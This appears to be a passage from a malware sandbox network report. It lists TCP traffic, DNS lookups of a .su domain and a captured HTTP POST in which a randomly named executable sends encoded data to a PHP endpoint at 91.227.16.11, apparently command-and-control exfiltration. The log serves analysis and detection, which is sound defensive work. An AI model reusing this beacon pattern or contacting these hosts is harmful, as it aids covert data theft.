                                                                                      Mar 6, 2024 09:53:34.818768024 CET804980291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:34.818795919 CET804980291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:34.819029093 CET4980280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:35.160180092 CET804980291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:35.191509962 CET804980291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:35.247646093 CET4980280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:35.306260109 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:35.651144981 CET804980391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:35.651338100 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:35.651540995 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:35.996356964 CET804980391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:35.996496916 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:36.001449108 CET804980391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:36.043371916 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:36.341484070 CET804980391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:36.369654894 CET804980391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:36.418365002 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:36.492297888 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:36.493290901 CET4980480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:36.836568117 CET804980491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:36.836719990 CET4980480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:36.836982012 CET4980480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:36.837378979 CET804980391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:36.837440014 CET4980380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:37.180238008 CET804980491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:37.180258989 CET804980491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:37.180792093 CET4980480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:37.524168015 CET804980491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:37.552112103 CET804980491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:37.605837107 CET4980480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:37.667908907 CET4980280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:37.668658018 CET4980580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:38.013967991 CET804980591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:38.014125109 CET4980580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:38.014337063 CET4980580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:38.359481096 CET804980591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:38.359524965 CET804980591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:38.359833956 CET4980580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:38.705239058 CET804980591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:38.732381105 CET804980591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:38.777663946 CET4980580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:38.856157064 CET4980580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:38.857144117 CET4980680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.030674934 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.150319099 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.198061943 CET804980691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.198256969 CET4980680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.201288939 CET804980591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.201503038 CET4980580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.373919010 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.374085903 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.374428034 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.496160030 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.496232986 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.496459007 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.717446089 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.717653036 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.717894077 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.842009068 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.842035055 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.842411041 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.061027050 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.089755058 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.137141943 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.187966108 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.214409113 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.262048960 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.336122036 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.337176085 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.337178946 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.678486109 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.678819895 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.678903103 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.679413080 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.679474115 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.682728052 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.682779074 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.020117998 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.020140886 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.020387888 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.362099886 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.388299942 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.434113026 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.506522894 CET4976080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.506660938 CET4977980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.506742001 CET4980480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.511065960 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.856879950 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.857024908 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.857204914 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.202766895 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.202788115 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.203042030 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.548850060 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.577083111 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.621412992 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.696109056 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.697096109 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.038434029 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.038580894 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.038794994 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.041845083 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.041904926 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.379961014 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.379976988 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.380249977 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.721605062 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.748769999 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.793293953 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.868242025 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.870068073 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.209569931 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.209666967 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.216089010 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.216264009 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.216420889 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.562505960 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.562525034 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.562808990 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.908999920 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.933567047 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.980783939 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.053714037 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.054069042 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.055063009 CET4981380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.107254028 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.226697922 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.395644903 CET804981391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.395735979 CET4981380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.400049925 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.400131941 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.453660011 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.453942060 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.454027891 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.568190098 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.568278074 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.568485975 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.800453901 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.800508022 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.800812006 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.909821033 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.909878969 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.910088062 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.147289038 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.174747944 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.215131044 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.251547098 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.275571108 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.324584961 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.401724100 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.401840925 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.402792931 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.743104935 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.743164062 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.745549917 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.745621920 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.745827913 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.748068094 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.748114109 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.088705063 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.088721991 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.088987112 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.432326078 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.457406044 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.512031078 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.571053982 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.572041035 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.914024115 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.914078951 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.917052984 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.917238951 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.917309046 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.262315989 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.262368917 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.262454033 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.309061050 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.607675076 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.636464119 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.683959961 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.760512114 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.761409998 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.105637074 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.105870008 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.106252909 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.106362104 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.106528997 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.451358080 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.451417923 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.451735020 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.796807051 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.826376915 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.871464014 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.945061922 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.945981979 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.287578106 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.287668943 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.287842989 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.289940119 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.290021896 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.629374981 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.629435062 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.629688978 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.971345901 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.001543999 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.043339968 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.116729021 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.117422104 CET4982080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.189150095 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.307717085 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.458476067 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.458600044 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.460331917 CET804982091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.460408926 CET4982080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.531666040 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.531769037 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.532035112 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.651010990 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.651206970 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.651314020 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.874351025 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.874411106 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.879584074 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.994483948 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.994503975 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.994788885 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.226296902 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.253804922 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.293318987 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.338419914 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.367233992 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.418319941 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.491945982 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.491940975 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.493108988 CET4982380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.834415913 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.834542036 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.835110903 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.835170031 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.837970018 CET804982391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.838056087 CET4982380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.838244915 CET4982380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:53.184022903 CET4982380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:53.184164047 CET804982391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:53.184180021 CET804982391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:53.230911970 CET4982380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:53.529436111 CET804982391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:53.558501005 CET804982391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:53.605808020 CET4982380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:53.680387020 CET4982480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:54.025597095 CET804982491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:54.025928020 CET4982480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:54.026032925 CET4982480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:54.371223927 CET804982491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:54.371263981 CET804982491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:54.371597052 CET4982480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:54.717875957 CET804982491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:54.940803051 CET804982491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:54.996428967 CET4982480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:55.056610107 CET4982480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:55.057425976 CET4982580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:55.401978970 CET804982491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:55.402127028 CET4982480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:55.405006886 CET804982591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:55.406721115 CET4982580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:55.406812906 CET4982580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:55.754309893 CET804982591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:55.754362106 CET804982591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:55.754659891 CET4982580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:56.102370977 CET804982591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:56.131896973 CET804982591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:56.184051037 CET4982580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:56.259497881 CET4982580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:56.260348082 CET4982680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:56.607229948 CET804982591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:56.607333899 CET4982580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:56.607788086 CET804982691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:56.607886076 CET4982680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:54:04.600178003 CET4982680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:54:04.947907925 CET804982691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:54:04.947957993 CET804982691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:54:04.948088884 CET4982680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:54:05.295806885 CET804982691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:54:05.323074102 CET804982691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:54:05.371437073 CET4982680192.168.2.491.227.16.11

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 6, 2024 09:52:29.982539892 CET5542953192.168.2.41.1.1.1
                                                                                      Mar 6, 2024 09:52:30.980777979 CET5542953192.168.2.41.1.1.1
                                                                                      Mar 6, 2024 09:52:31.642987013 CET53554291.1.1.1192.168.2.4
                                                                                      Mar 6, 2024 09:52:31.643016100 CET53554291.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Mar 6, 2024 09:52:29.982539892 CET192.168.2.41.1.1.10x1dc4Standard query (0)h172956.srv11.test-hf.suA (IP address)IN (0x0001)false
                                                                                      Mar 6, 2024 09:52:30.980777979 CET192.168.2.41.1.1.10x1dc4Standard query (0)h172956.srv11.test-hf.suA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Mar 6, 2024 09:52:31.642987013 CET1.1.1.1192.168.2.40x1dc4No error (0)h172956.srv11.test-hf.su91.227.16.11A (IP address)IN (0x0001)false
                                                                                      Mar 6, 2024 09:52:31.643016100 CET1.1.1.1192.168.2.40x1dc4No error (0)h172956.srv11.test-hf.su91.227.16.11A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • h172956.srv11.test-hf.su

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:31.999098063 CET347OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 344
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:32.348309040 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:32.349637032 CET344OUTData Raw: 05 07 01 05 03 0d 04 06 05 06 02 01 02 0c 01 00 00 0b 05 00 02 0d 03 01 01 06 0c 07 03 00 03 07 0a 02 05 0a 03 54 06 55 0e 54 06 53 06 05 07 54 03 0a 0d 0b 0d 05 01 0a 06 53 03 01 07 03 05 0e 00 07 0e 0a 04 05 06 08 0f 0f 0e 03 0f 53 0f 06 06 02
                                                                                      Data Ascii: TUTSTSSPUQW\L}P`z@vb\XuflAhlqLwRRk]xllcKo^bIC`vdp~e~V@xCPb[
                                                                                      Mar 6, 2024 09:52:32.812009096 CET1286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:32 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
